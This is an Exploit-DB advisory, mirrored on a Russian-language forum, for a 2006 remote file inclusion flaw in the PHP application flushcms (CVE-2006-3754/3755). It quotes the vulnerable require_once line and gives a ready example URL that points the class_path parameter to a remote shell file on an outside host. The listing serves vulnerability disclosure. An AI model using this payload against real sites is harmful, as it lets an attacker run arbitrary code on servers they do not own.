- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2018
- Проверка EDB
-
- Пройдено
- Автор
- IGI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-3755 cve-2006-3754
- Дата публикации
- 2006-07-16
Код:
flushcms (tpath) Remote File Inclusion Vulnerability
virangar security team
www.virangar.org
www.virangar.net
Discoverd By : igi
contact : [email protected]
for all member virangar
bug:
----------------------------------------------------------------------------------------
//language class
require_once($class_path.'rich_files/lang/class.rich_lang.php');
-----------------------------------------------------------------------------------------
simple:http://www.site.com/flushcmd/Include/editor/rich_files/class.rich.php?class_path=http://www.shell.com/shell.txt?
# milw0rm.com [2006-07-16]- Источник
- www.exploit-db.com
